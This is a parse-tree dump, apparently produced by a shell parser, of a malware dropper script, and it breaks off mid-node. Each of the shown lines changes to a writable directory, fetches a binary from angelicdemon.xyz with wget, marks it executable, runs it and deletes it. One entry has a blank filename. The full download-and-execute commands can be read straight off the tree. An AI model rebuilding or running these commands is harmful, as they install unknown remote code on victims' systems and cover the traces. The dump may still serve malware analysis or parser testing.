ListNode(lineno=2, pos=(13, 170), parts=[
  CommandNode(lineno=2, pos=(13, 20), parts=[
    WordNode(lineno=2, pos=(13, 15), word='cd'),
    WordNode(lineno=2, pos=(16, 20), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(21, 23)),
  CommandNode(lineno=2, pos=(24, 35), parts=[
    WordNode(lineno=2, pos=(24, 26), word='cd'),
    WordNode(lineno=2, pos=(27, 35), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(36, 38)),
  CommandNode(lineno=2, pos=(39, 46), parts=[
    WordNode(lineno=2, pos=(39, 41), word='cd'),
    WordNode(lineno=2, pos=(42, 46), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(47, 49)),
  CommandNode(lineno=2, pos=(50, 58), parts=[
    WordNode(lineno=2, pos=(50, 52), word='cd'),
    WordNode(lineno=2, pos=(53, 58), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(59, 61)),
  CommandNode(lineno=2, pos=(62, 66), parts=[
    WordNode(lineno=2, pos=(62, 64), word='cd'),
    WordNode(lineno=2, pos=(65, 66), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(66, 67)),
  CommandNode(lineno=2, pos=(68, 109), parts=[
    WordNode(lineno=2, pos=(68, 72), word='wget'),
    WordNode(lineno=2, pos=(73, 109), word='http://angelicdemon.xyz/lungkassssss'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(109, 110)),
  CommandNode(lineno=2, pos=(111, 132), parts=[
    WordNode(lineno=2, pos=(111, 116), word='chmod'),
    WordNode(lineno=2, pos=(117, 119), word='+x'),
    WordNode(lineno=2, pos=(120, 132), word='lungkassssss'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(132, 133)),
  CommandNode(lineno=2, pos=(134, 148), parts=[
    WordNode(lineno=2, pos=(134, 148), word='./lungkassssss'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(148, 149)),
  CommandNode(lineno=2, pos=(150, 170), parts=[
    WordNode(lineno=2, pos=(150, 152), word='rm'),
    WordNode(lineno=2, pos=(153, 156), word='-rf'),
    WordNode(lineno=2, pos=(157, 170), word='lungkassssss\r'),
  ]),
])
ListNode(lineno=3, pos=(171, 324), parts=[
  CommandNode(lineno=3, pos=(171, 178), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 178), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(179, 181)),
  CommandNode(lineno=3, pos=(182, 193), parts=[
    WordNode(lineno=3, pos=(182, 184), word='cd'),
    WordNode(lineno=3, pos=(185, 193), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(194, 196)),
  CommandNode(lineno=3, pos=(197, 204), parts=[
    WordNode(lineno=3, pos=(197, 199), word='cd'),
    WordNode(lineno=3, pos=(200, 204), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(205, 207)),
  CommandNode(lineno=3, pos=(208, 216), parts=[
    WordNode(lineno=3, pos=(208, 210), word='cd'),
    WordNode(lineno=3, pos=(211, 216), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(217, 219)),
  CommandNode(lineno=3, pos=(220, 224), parts=[
    WordNode(lineno=3, pos=(220, 222), word='cd'),
    WordNode(lineno=3, pos=(223, 224), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 266), parts=[
    WordNode(lineno=3, pos=(226, 230), word='wget'),
    WordNode(lineno=3, pos=(231, 266), word='http://angelicdemon.xyz/mangossssss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(266, 267)),
  CommandNode(lineno=3, pos=(268, 288), parts=[
    WordNode(lineno=3, pos=(268, 273), word='chmod'),
    WordNode(lineno=3, pos=(274, 276), word='+x'),
    WordNode(lineno=3, pos=(277, 288), word='mangossssss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(288, 289)),
  CommandNode(lineno=3, pos=(290, 303), parts=[
    WordNode(lineno=3, pos=(290, 303), word='./mangossssss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(303, 304)),
  CommandNode(lineno=3, pos=(305, 324), parts=[
    WordNode(lineno=3, pos=(305, 307), word='rm'),
    WordNode(lineno=3, pos=(308, 311), word='-rf'),
    WordNode(lineno=3, pos=(312, 324), word='mangossssss\r'),
  ]),
])
ListNode(lineno=4, pos=(325, 478), parts=[
  CommandNode(lineno=4, pos=(325, 332), parts=[
    WordNode(lineno=4, pos=(325, 327), word='cd'),
    WordNode(lineno=4, pos=(328, 332), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(333, 335)),
  CommandNode(lineno=4, pos=(336, 347), parts=[
    WordNode(lineno=4, pos=(336, 338), word='cd'),
    WordNode(lineno=4, pos=(339, 347), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(348, 350)),
  CommandNode(lineno=4, pos=(351, 358), parts=[
    WordNode(lineno=4, pos=(351, 353), word='cd'),
    WordNode(lineno=4, pos=(354, 358), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(359, 361)),
  CommandNode(lineno=4, pos=(362, 370), parts=[
    WordNode(lineno=4, pos=(362, 364), word='cd'),
    WordNode(lineno=4, pos=(365, 370), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(371, 373)),
  CommandNode(lineno=4, pos=(374, 378), parts=[
    WordNode(lineno=4, pos=(374, 376), word='cd'),
    WordNode(lineno=4, pos=(377, 378), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(378, 379)),
  CommandNode(lineno=4, pos=(380, 420), parts=[
    WordNode(lineno=4, pos=(380, 384), word='wget'),
    WordNode(lineno=4, pos=(385, 420), word='http://angelicdemon.xyz/opengglssss'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(420, 421)),
  CommandNode(lineno=4, pos=(422, 442), parts=[
    WordNode(lineno=4, pos=(422, 427), word='chmod'),
    WordNode(lineno=4, pos=(428, 430), word='+x'),
    WordNode(lineno=4, pos=(431, 442), word='opengglssss'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(442, 443)),
  CommandNode(lineno=4, pos=(444, 457), parts=[
    WordNode(lineno=4, pos=(444, 457), word='./opengglssss'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(457, 458)),
  CommandNode(lineno=4, pos=(459, 478), parts=[
    WordNode(lineno=4, pos=(459, 461), word='rm'),
    WordNode(lineno=4, pos=(462, 465), word='-rf'),
    WordNode(lineno=4, pos=(466, 478), word='opengglssss\r'),
  ]),
])
ListNode(lineno=5, pos=(479, 620), parts=[
  CommandNode(lineno=5, pos=(479, 486), parts=[
    WordNode(lineno=5, pos=(479, 481), word='cd'),
    WordNode(lineno=5, pos=(482, 486), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(487, 489)),
  CommandNode(lineno=5, pos=(490, 501), parts=[
    WordNode(lineno=5, pos=(490, 492), word='cd'),
    WordNode(lineno=5, pos=(493, 501), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(502, 504)),
  CommandNode(lineno=5, pos=(505, 512), parts=[
    WordNode(lineno=5, pos=(505, 507), word='cd'),
    WordNode(lineno=5, pos=(508, 512), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(513, 515)),
  CommandNode(lineno=5, pos=(516, 524), parts=[
    WordNode(lineno=5, pos=(516, 518), word='cd'),
    WordNode(lineno=5, pos=(519, 524), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(525, 527)),
  CommandNode(lineno=5, pos=(528, 532), parts=[
    WordNode(lineno=5, pos=(528, 530), word='cd'),
    WordNode(lineno=5, pos=(531, 532), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(532, 533)),
  CommandNode(lineno=5, pos=(534, 571), parts=[
    WordNode(lineno=5, pos=(534, 538), word='wget'),
    WordNode(lineno=5, pos=(539, 571), word='http://angelicdemon.xyz/vastssss'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(571, 572)),
  CommandNode(lineno=5, pos=(573, 590), parts=[
    WordNode(lineno=5, pos=(573, 578), word='chmod'),
    WordNode(lineno=5, pos=(579, 581), word='+x'),
    WordNode(lineno=5, pos=(582, 590), word='vastssss'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(590, 591)),
  CommandNode(lineno=5, pos=(592, 602), parts=[
    WordNode(lineno=5, pos=(592, 602), word='./vastssss'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(602, 603)),
  CommandNode(lineno=5, pos=(604, 620), parts=[
    WordNode(lineno=5, pos=(604, 606), word='rm'),
    WordNode(lineno=5, pos=(607, 610), word='-rf'),
    WordNode(lineno=5, pos=(611, 620), word='vastssss\r'),
  ]),
])
ListNode(lineno=6, pos=(621, 774), parts=[
  CommandNode(lineno=6, pos=(621, 628), parts=[
    WordNode(lineno=6, pos=(621, 623), word='cd'),
    WordNode(lineno=6, pos=(624, 628), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(629, 631)),
  CommandNode(lineno=6, pos=(632, 643), parts=[
    WordNode(lineno=6, pos=(632, 634), word='cd'),
    WordNode(lineno=6, pos=(635, 643), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(644, 646)),
  CommandNode(lineno=6, pos=(647, 654), parts=[
    WordNode(lineno=6, pos=(647, 649), word='cd'),
    WordNode(lineno=6, pos=(650, 654), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(655, 657)),
  CommandNode(lineno=6, pos=(658, 666), parts=[
    WordNode(lineno=6, pos=(658, 660), word='cd'),
    WordNode(lineno=6, pos=(661, 666), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(667, 669)),
  CommandNode(lineno=6, pos=(670, 674), parts=[
    WordNode(lineno=6, pos=(670, 672), word='cd'),
    WordNode(lineno=6, pos=(673, 674), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(674, 675)),
  CommandNode(lineno=6, pos=(676, 716), parts=[
    WordNode(lineno=6, pos=(676, 680), word='wget'),
    WordNode(lineno=6, pos=(681, 716), word='http://angelicdemon.xyz/greypssssss'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(716, 717)),
  CommandNode(lineno=6, pos=(718, 738), parts=[
    WordNode(lineno=6, pos=(718, 723), word='chmod'),
    WordNode(lineno=6, pos=(724, 726), word='+x'),
    WordNode(lineno=6, pos=(727, 738), word='greypssssss'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(738, 739)),
  CommandNode(lineno=6, pos=(740, 753), parts=[
    WordNode(lineno=6, pos=(740, 753), word='./greypssssss'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(753, 754)),
  CommandNode(lineno=6, pos=(755, 774), parts=[
    WordNode(lineno=6, pos=(755, 757), word='rm'),
    WordNode(lineno=6, pos=(758, 761), word='-rf'),
    WordNode(lineno=6, pos=(762, 774), word='greypssssss\r'),
  ]),
])
ListNode(lineno=7, pos=(775, 928), parts=[
  CommandNode(lineno=7, pos=(775, 782), parts=[
    WordNode(lineno=7, pos=(775, 777), word='cd'),
    WordNode(lineno=7, pos=(778, 782), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(783, 785)),
  CommandNode(lineno=7, pos=(786, 797), parts=[
    WordNode(lineno=7, pos=(786, 788), word='cd'),
    WordNode(lineno=7, pos=(789, 797), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(798, 800)),
  CommandNode(lineno=7, pos=(801, 808), parts=[
    WordNode(lineno=7, pos=(801, 803), word='cd'),
    WordNode(lineno=7, pos=(804, 808), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(809, 811)),
  CommandNode(lineno=7, pos=(812, 820), parts=[
    WordNode(lineno=7, pos=(812, 814), word='cd'),
    WordNode(lineno=7, pos=(815, 820), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(821, 823)),
  CommandNode(lineno=7, pos=(824, 828), parts=[
    WordNode(lineno=7, pos=(824, 826), word='cd'),
    WordNode(lineno=7, pos=(827, 828), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(828, 829)),
  CommandNode(lineno=7, pos=(830, 870), parts=[
    WordNode(lineno=7, pos=(830, 834), word='wget'),
    WordNode(lineno=7, pos=(835, 870), word='http://angelicdemon.xyz/kuhamosssss'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(870, 871)),
  CommandNode(lineno=7, pos=(872, 892), parts=[
    WordNode(lineno=7, pos=(872, 877), word='chmod'),
    WordNode(lineno=7, pos=(878, 880), word='+x'),
    WordNode(lineno=7, pos=(881, 892), word='kuhamosssss'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(892, 893)),
  CommandNode(lineno=7, pos=(894, 907), parts=[
    WordNode(lineno=7, pos=(894, 907), word='./kuhamosssss'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(907, 908)),
  CommandNode(lineno=7, pos=(909, 928), parts=[
    WordNode(lineno=7, pos=(909, 911), word='rm'),
    WordNode(lineno=7, pos=(912, 915), word='-rf'),
    WordNode(lineno=7, pos=(916, 928), word='kuhamosssss\r'),
  ]),
])
ListNode(lineno=8, pos=(929, 1082), parts=[
  CommandNode(lineno=8, pos=(929, 936), parts=[
    WordNode(lineno=8, pos=(929, 931), word='cd'),
    WordNode(lineno=8, pos=(932, 936), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(937, 939)),
  CommandNode(lineno=8, pos=(940, 951), parts=[
    WordNode(lineno=8, pos=(940, 942), word='cd'),
    WordNode(lineno=8, pos=(943, 951), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(952, 954)),
  CommandNode(lineno=8, pos=(955, 962), parts=[
    WordNode(lineno=8, pos=(955, 957), word='cd'),
    WordNode(lineno=8, pos=(958, 962), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(963, 965)),
  CommandNode(lineno=8, pos=(966, 974), parts=[
    WordNode(lineno=8, pos=(966, 968), word='cd'),
    WordNode(lineno=8, pos=(969, 974), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(975, 977)),
  CommandNode(lineno=8, pos=(978, 982), parts=[
    WordNode(lineno=8, pos=(978, 980), word='cd'),
    WordNode(lineno=8, pos=(981, 982), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(982, 983)),
  CommandNode(lineno=8, pos=(984, 1024), parts=[
    WordNode(lineno=8, pos=(984, 988), word='wget'),
    WordNode(lineno=8, pos=(989, 1024), word='http://angelicdemon.xyz/marcossssss'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1024, 1025)),
  CommandNode(lineno=8, pos=(1026, 1046), parts=[
    WordNode(lineno=8, pos=(1026, 1031), word='chmod'),
    WordNode(lineno=8, pos=(1032, 1034), word='+x'),
    WordNode(lineno=8, pos=(1035, 1046), word='marcossssss'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1046, 1047)),
  CommandNode(lineno=8, pos=(1048, 1061), parts=[
    WordNode(lineno=8, pos=(1048, 1061), word='./marcossssss'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1061, 1062)),
  CommandNode(lineno=8, pos=(1063, 1082), parts=[
    WordNode(lineno=8, pos=(1063, 1065), word='rm'),
    WordNode(lineno=8, pos=(1066, 1069), word='-rf'),
    WordNode(lineno=8, pos=(1070, 1082), word='marcossssss\r'),
  ]),
])
ListNode(lineno=9, pos=(1083, 1236), parts=[
  CommandNode(lineno=9, pos=(1083, 1090), parts=[
    WordNode(lineno=9, pos=(1083, 1085), word='cd'),
    WordNode(lineno=9, pos=(1086, 1090), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1091, 1093)),
  CommandNode(lineno=9, pos=(1094, 1105), parts=[
    WordNode(lineno=9, pos=(1094, 1096), word='cd'),
    WordNode(lineno=9, pos=(1097, 1105), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1106, 1108)),
  CommandNode(lineno=9, pos=(1109, 1116), parts=[
    WordNode(lineno=9, pos=(1109, 1111), word='cd'),
    WordNode(lineno=9, pos=(1112, 1116), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1117, 1119)),
  CommandNode(lineno=9, pos=(1120, 1128), parts=[
    WordNode(lineno=9, pos=(1120, 1122), word='cd'),
    WordNode(lineno=9, pos=(1123, 1128), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1129, 1131)),
  CommandNode(lineno=9, pos=(1132, 1136), parts=[
    WordNode(lineno=9, pos=(1132, 1134), word='cd'),
    WordNode(lineno=9, pos=(1135, 1136), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1136, 1137)),
  CommandNode(lineno=9, pos=(1138, 1178), parts=[
    WordNode(lineno=9, pos=(1138, 1142), word='wget'),
    WordNode(lineno=9, pos=(1143, 1178), word='http://angelicdemon.xyz/chikossssss'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1178, 1179)),
  CommandNode(lineno=9, pos=(1180, 1200), parts=[
    WordNode(lineno=9, pos=(1180, 1185), word='chmod'),
    WordNode(lineno=9, pos=(1186, 1188), word='+x'),
    WordNode(lineno=9, pos=(1189, 1200), word='chikossssss'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1200, 1201)),
  CommandNode(lineno=9, pos=(1202, 1215), parts=[
    WordNode(lineno=9, pos=(1202, 1215), word='./chikossssss'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1215, 1216)),
  CommandNode(lineno=9, pos=(1217, 1236), parts=[
    WordNode(lineno=9, pos=(1217, 1219), word='rm'),
    WordNode(lineno=9, pos=(1220, 1223), word='-rf'),
    WordNode(lineno=9, pos=(1224, 1236), word='chikossssss\r'),
  ]),
])
ListNode(lineno=10, pos=(1237, 1394), parts=[
  CommandNode(lineno=10, pos=(1237, 1244), parts=[
    WordNode(lineno=10, pos=(1237, 1239), word='cd'),
    WordNode(lineno=10, pos=(1240, 1244), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1245, 1247)),
  CommandNode(lineno=10, pos=(1248, 1259), parts=[
    WordNode(lineno=10, pos=(1248, 1250), word='cd'),
    WordNode(lineno=10, pos=(1251, 1259), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1260, 1262)),
  CommandNode(lineno=10, pos=(1263, 1270), parts=[
    WordNode(lineno=10, pos=(1263, 1265), word='cd'),
    WordNode(lineno=10, pos=(1266, 1270), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1271, 1273)),
  CommandNode(lineno=10, pos=(1274, 1282), parts=[
    WordNode(lineno=10, pos=(1274, 1276), word='cd'),
    WordNode(lineno=10, pos=(1277, 1282), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1283, 1285)),
  CommandNode(lineno=10, pos=(1286, 1290), parts=[
    WordNode(lineno=10, pos=(1286, 1288), word='cd'),
    WordNode(lineno=10, pos=(1289, 1290), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1290, 1291)),
  CommandNode(lineno=10, pos=(1292, 1333), parts=[
    WordNode(lineno=10, pos=(1292, 1296), word='wget'),
    WordNode(lineno=10, pos=(1297, 1333), word='http://angelicdemon.xyz/pchikossssss'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1333, 1334)),
  CommandNode(lineno=10, pos=(1335, 1356), parts=[
    WordNode(lineno=10, pos=(1335, 1340), word='chmod'),
    WordNode(lineno=10, pos=(1341, 1343), word='+x'),
    WordNode(lineno=10, pos=(1344, 1356), word='pchikossssss'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1356, 1357)),
  CommandNode(lineno=10, pos=(1358, 1372), parts=[
    WordNode(lineno=10, pos=(1358, 1372), word='./pchikossssss'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1372, 1373)),
  CommandNode(lineno=10, pos=(1374, 1394), parts=[
    WordNode(lineno=10, pos=(1374, 1376), word='rm'),
    WordNode(lineno=10, pos=(1377, 1380), word='-rf'),
    WordNode(lineno=10, pos=(1381, 1394), word='pchikossssss\r'),
  ]),
])
ListNode(lineno=11, pos=(1395, 1532), parts=[
  CommandNode(lineno=11, pos=(1395, 1402), parts=[
    WordNode(lineno=11, pos=(1395, 1397), word='cd'),
    WordNode(lineno=11, pos=(1398, 1402), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1403, 1405)),
  CommandNode(lineno=11, pos=(1406, 1417), parts=[
    WordNode(lineno=11, pos=(1406, 1408), word='cd'),
    WordNode(lineno=11, pos=(1409, 1417), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1418, 1420)),
  CommandNode(lineno=11, pos=(1421, 1428), parts=[
    WordNode(lineno=11, pos=(1421, 1423), word='cd'),
    WordNode(lineno=11, pos=(1424, 1428), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1429, 1431)),
  CommandNode(lineno=11, pos=(1432, 1440), parts=[
    WordNode(lineno=11, pos=(1432, 1434), word='cd'),
    WordNode(lineno=11, pos=(1435, 1440), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1441, 1443)),
  CommandNode(lineno=11, pos=(1444, 1448), parts=[
    WordNode(lineno=11, pos=(1444, 1446), word='cd'),
    WordNode(lineno=11, pos=(1447, 1448), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1448, 1449)),
  CommandNode(lineno=11, pos=(1450, 1486), parts=[
    WordNode(lineno=11, pos=(1450, 1454), word='wget'),
    WordNode(lineno=11, pos=(1455, 1486), word='http://angelicdemon.xyz/cosssss'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1486, 1487)),
  CommandNode(lineno=11, pos=(1488, 1504), parts=[
    WordNode(lineno=11, pos=(1488, 1493), word='chmod'),
    WordNode(lineno=11, pos=(1494, 1496), word='+x'),
    WordNode(lineno=11, pos=(1497, 1504), word='cosssss'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1504, 1505)),
  CommandNode(lineno=11, pos=(1506, 1515), parts=[
    WordNode(lineno=11, pos=(1506, 1515), word='./cosssss'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1515, 1516)),
  CommandNode(lineno=11, pos=(1517, 1532), parts=[
    WordNode(lineno=11, pos=(1517, 1519), word='rm'),
    WordNode(lineno=11, pos=(1520, 1523), word='-rf'),
    WordNode(lineno=11, pos=(1524, 1532), word='cosssss\r'),
  ]),
])
ListNode(lineno=12, pos=(1533, 1654), parts=[
  CommandNode(lineno=12, pos=(1533, 1540), parts=[
    WordNode(lineno=12, pos=(1533, 1535), word='cd'),
    WordNode(lineno=12, pos=(1536, 1540), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1541, 1543)),
  CommandNode(lineno=12, pos=(1544, 1555), parts=[
    WordNode(lineno=12, pos=(1544, 1546), word='cd'),
    WordNode(lineno=12, pos=(1547, 1555), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1556, 1558)),
  CommandNode(lineno=12, pos=(1559, 1566), parts=[
    WordNode(lineno=12, pos=(1559, 1561), word='cd'),
    WordNode(lineno=12, pos=(1562, 1566), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1567, 1569)),
  CommandNode(lineno=12, pos=(1570, 1578), parts=[
    WordNode(lineno=12, pos=(1570, 1572), word='cd'),
    WordNode(lineno=12, pos=(1573, 1578), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1579, 1581)),
  CommandNode(lineno=12, pos=(1582, 1586), parts=[
    WordNode(lineno=12, pos=(1582, 1584), word='cd'),
    WordNode(lineno=12, pos=(1585, 1586), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1586, 1587)),
  CommandNode(lineno=12, pos=(1588, 1620), parts=[
    WordNode(lineno=12, pos=(1588, 1592), word='wget'),
    WordNode(lineno=12, pos=(1593, 1620), word='http://angelicdemon.xyz/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1620, 1621)),
  CommandNode(lineno=12, pos=(1622, 1634), parts=[
    WordNode(lineno=12, pos=(1622, 1627), word='chmod'),
    WordNode(lineno=12, pos=(1628, 1630), word='+x'),
    WordNode(lineno=12, pos=(1631, 1634), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1634, 1635)),
  CommandNode(lineno=12, pos=(1636, 1641), parts=[
    WordNode(lineno=12, pos=(1636, 1641), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1641, 1642)),
  CommandNode(lineno=12, pos=(1643, 1654), parts=[
    WordNode(lineno=12, pos=(1643, 1645), word='rm'),
    WordNode(lineno=12, pos=(1646, 1649), word='-rf'),
    WordNode(lineno=12, pos=(1650, 1654), word=' \r'),
  ]),
])
ListNode(lineno=13, pos=(1655, 1812), parts=[
  CommandNode(lineno=13, pos=(1655, 1662), parts=[
    WordNode(lineno=13, pos=(1655, 1657), word='cd'),
    WordNode(lineno=13, pos=(1658, 1662), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1663, 1665)),
  CommandNode(lineno=13, pos=(1666, 1677), parts=[
    WordNode(lineno=13, pos=(1666, 1668), word='cd'),
    WordNode(lineno=13, pos=(1669, 1677), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1678, 1680)),
  CommandNode(lineno=13, pos=(1681, 1688), parts=[
    WordNode(lineno=13, pos=(1681, 1683), word='cd'),
    WordNode(lineno=13, pos=(1684, 1688), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1689, 1691)),
  CommandNode(lineno=13, pos=(1692, 1700), parts=[
    WordNode(lineno=13, pos=(1692, 1694), word='cd'),
    WordNode(lineno=13, pos=(1695, 1700), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1701, 1703)),
  CommandNode(lineno=13, pos=(1704, 1708), parts=[
    WordNode(lineno=13, pos=(1704, 1706), word='cd'),
    WordNode(lineno=13, pos=(1707, 1708), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1708, 1709)),
  CommandNode(lineno=13, pos=(1710, 1751), parts=[
    WordNode(lineno=13, pos=(1710, 1714), word='wget'),
    WordNode(lineno=13, pos=(1715, 1751), word='http://angelicdemon.xyz/facebooksss3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1751, 1752)),
  CommandNode(lineno=13, pos=(1753, 1774), parts=[
    WordNode(lineno=13, pos=(1753, 1758), word='chmod'),
    WordNode(lineno=13, pos=(1759, 1761), word='+x'),
    WordNode(lineno=13, pos=(1762, 1774), word='facebooksss3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1774, 1775)),
  CommandNode(lineno=13, pos=(1776, 1790), parts=[
    WordNode(lineno=13, pos=(1776, 1790), word='./facebooksss3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1790, 1791)),
  CommandNode(lineno=13, pos=(1792, 1812), parts=[
    WordNode(lineno=13, pos=(1792, 1794), word='rm'),
    WordNode(lineno=13, pos=(1795, 1798), word='-rf'),
    WordNode(lineno=13, pos=(1799, 1812), word='facebooksss3\r'),
  ]),
])
ListNode(lineno=14, pos=(1813, 1974), parts=[
  CommandNode(lineno=14, pos=(1813, 1820), parts=[
    WordNode(lineno=14, pos=(1813, 1815), word='cd'),
    WordNode(lineno=14, pos=(1816, 1820), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1821, 1823)),
  CommandNode(lineno=14, pos=(1824, 1835), parts=[
    WordNode(lineno=14, pos=(1824, 1826), word='cd'),
    WordNode(lineno=14, pos=(1827, 1835), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1836, 1838)),
  CommandNode(lineno=14, pos=(1839, 1846), parts=[
    WordNode(lineno=14, pos=(1839, 1841), word='cd'),
    WordNode(lineno=14, pos=(1842, 1846), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1847, 1849)),
  CommandNode(lineno=14, pos=(1850, 1858), parts=[
    WordNode(lineno=14, pos=(1850, 1852), word='cd'),
    WordNode(lineno=14, pos=(1853, 1858), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1859, 1861)),
  CommandNode(lineno=14, pos=(1862, 1866), parts=[
    WordNode(lineno=14, pos=(1862, 1864), word='cd'),
    WordNode(lineno=14, pos=(1865, 1866), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1866, 1867)),
  CommandNode(lineno=14, pos=(1868, 1910), parts=[
    WordNode(lineno=14, pos=(1868, 1872), word='wget'),
    WordNode(lineno=14, pos=(1873, 1910), word='http://angelicdemon.xyz/netdeldssssss'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1910, 1911)),
  CommandNode(lineno=14, pos=(1912, 1934), parts=[
    WordNode(lineno=14, pos=(1912, 1917), word='chmod'),
    WordNode(lineno=14, pos=(1918, 1920), word='+x'),
    WordNode(lineno=14, pos=(1921, 1934), word='netdeldssssss'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1934, 1935)),
  CommandNode(lineno=14, pos=(1936, 1951), parts=[
    WordNode(lineno=14, pos=(1936, 1951), word='./netdeldssssss'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1951, 1952)),
  CommandNode(lineno=14, pos=(1953, 1974), parts=[
    WordNode(lineno=14, pos=(1953, 1955), word='rm'),
    WordNode(lineno=14, pos=(1956, 1959), word='-rf'),
    WordNode(lineno=14, pos=(1960, 1974), word='netdeldssssss\r'),
  ]),
])
ListNode(lineno=15, pos=(1975, 2097), parts=[
